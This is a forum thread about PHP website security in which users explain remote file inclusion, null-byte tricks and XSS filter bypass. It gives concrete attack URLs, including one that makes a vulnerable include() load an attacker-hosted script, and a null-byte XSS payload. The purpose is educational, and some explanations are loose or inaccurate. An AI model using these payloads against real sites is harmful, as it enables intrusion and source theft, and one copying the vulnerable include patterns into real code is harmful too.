Heya,

Anyone can provide any info for this subject?..

Thanks!
NwS

Website Security is a very wide topic involving many parties (webmaster, programmer, host). What information are you looking for ;-)?

Heya,

I would like to know first of all which is the best way to protect your files from outside incoming attempts to get info from them (if you know wat i mean xD), MySQL security (dnt know a lot of info about this..) and was just wondering sites like PayPal which are based on $ how do they protect themselves and stuff if you got any ideas..

Thanks for your time.
NwS

For those coding PHP I recommend the book "Secure PHP Development" by Mohammed Kabir. It's not a HOWTO, but kinda philosophical book for professional Web-developers.

Ah cool thanks for the info ill check it out xD

The answer is quite simple:

if($know_what_you_are_doing) {
write_code();
} else {
die "Not allowed to write code";
}

Seriously, I'm getting so tired of these kiddies that pick up a book on php, start writing horrible code and get confused when they found out their database is empty. Read people, don't be affraid to read! Don't know what SQL injection or XSS means? Don't write code unless you understand the concepts. Null byte anyone? Go find out ...

@ Blom :

That's probably the funniest thing I've read in a long time.
I think you're scaring people... :)

The answer is quite simple:

if($know_what_you_are_doing) {
write_code();
} else {
die "Not allowed to write code";
}

Seriously, I'm getting so tired of these kiddies that pick up a book on php, start writing horrible code and get confused when they found out their database is empty. Read people, don't be affraid to read! Don't know what SQL injection or XSS means? Don't write code unless you understand the concepts. Null byte anyone? Go find out ...

Hehe that was hillarious. Anyway...Null Byte is a vulnerability which basically screws up CGI/PHP codes and makes the functions to function improperly at the http preprocessor end. It happens mostly when you have file names with null bytes;) am i right blom? And yes you're so right that these days kiddies don't want to study anything...they want it readymade spoon fed right out of the box.;)

Null byte, meaning injecting code into a URL and escaping other code. So for example if a script uses $_GET to obtain a specific filename, directory or path, it can easily be bypassed and escaped using something like "%00".

Another security vulnerability would be HTML code in strings. Hackers can use these to inject files into your scripts. For example, if you don't escape and convert all html characters posted by input fields, users can easily inject javascript, php, whatever into your site.

Hello pplz,

There's no such thing as '100% secure' software or whatever else.

I want to spend few tips with you guys, most of them i'm facing too ofter on free scripts or even in paid ones.

First the most common security bug is using of register_globals. But I'll skip it and will move to include(); and $_GET.

More ofter i can see code like that.


<?php

include($page.'.php');

?>


And URL http://somesite.com/index.php?page=news

As you can note the code above is using register globals, there's no validationg or filtering on incoming data, also the value of ?page= us the name of the php file which the script should include. So all we need to do is to upload include your own scripts, to upload it on host without php support so the include(); will read the php code not the returned from your php script html code; So let's say i write:


<?php

echo show_source('index.php');

?>


And save the file as show_source.php, then upload it to http://myhost.com/show_source.php and pass it to ?page like that:
http://somesite.com/index.php?page=http://myhost.com/show_source then i'll be able to see the source code of the index.php and you know what's next :) Also there's too many thing you can do if you find out such a security hole.

So some developers think that if they put all possible pages in array and then check the value from ?page if it exists in the array this is save them.

Let's imagine this situation:
If we have two files, index.php and home.php
index.php

<?php

$pages = array('page' => 'page.php', 'contact' => 'contact.php');
include('home.php');

?>


home.php

<?php

include($pages[$page]);

?>


So on first look this looks secure, but let's play around with it and break it down :P

The developer who is wrote this is expecting all $_GET variables to income from index.php just like: http://something/index.php?page=contact then the script will look at the array by array key and if the key exists will use the value assigned to this key to include the file. But we can call directly to home.php just like that:

http://something/main.php?pages[yourKey]=yourFilePath.php&page=yourKey

And again we'll be able to execute a remote script. This is possible because the array is created in index.php and used in home.php so we can call directly to home.php and to create the array with your URL QUERY (aka. $_GET) and home.php will load your file.

There's too many ways but i don't have time right now to spend them all... next time i'll show you how you can by-pass mime-type check in upload scripts so you will be able to upload whatever you want. Also i was thinking to show you something with regExp and bbcodes which will allow you to run XSS...

Note: I'm not trying to teach you or to play "look me i'm so smart, who is like me?" ;)

P.S. Excuse my English guys and also I'm not too clear when i should explain something :( I hope you will understand my examples.

Great post!
It also links to what I said about null byte.

I've seen code like that all over the web. The type you showed where the page/file name is in the URL and is obtained with the $_GET function. This can easily be escaped with null byte values such as the %00 I explained earlier.

Soon hackers/users will be inside your php.ini and boot.ini or whatever ;)

Thanks contrid.

I'll pay more attention on null char (byte) in my post. Also i'll show you an example.

As contrid said null byte know as null_char is first symbol in each symbol table and it's used to represend 'end of string'

http://en.wikipedia.org/wiki/ASCII - here you can see it in the ASCII table;
http://en.wikipedia.org/wiki/Null_character - here you can read more about null char;

Well next move to the example and after that I'll explain it;


<?php

$page = $_GET['page'];
$page = preg_replace('/script/', '', $page);

print $page;

?>


So this should replace the script in <script> and </script> tags, and It will. So let's play a little bit with this..

http://some/file.php?page=<script>alert('xss attack');</script>

Well this won't hurt as much, because preg_replace will recognize the script in <script> and </script> and will replace it with nothing. So simple it will output: <>alert('xss attack');

But if we try the same script but this time with null char... well let's do it:

http://some/file.php?page=<s\0cript>alert('xss attack');</s\0cript>

And Voala ... we Success, preg_replace won't match the script in <script> because it will note the null char and the preg_replace will do nothing to project as, but IE won't recognize it so the attack will success and an Alert Message Box will appear on the screen saying as 'XSS Attack' :)

FireFox will catch the null char and will terminate the script execution.

Sometimes we can run php code like we did with JS code ...

I don't have much time, I have to finish something, cya later guys, i'll show you another way to by-pass the regExp valdation.

I hope my posts to be useful for you and to help you to project your software much more.

P.S. Again, excume my English... :rolleyes: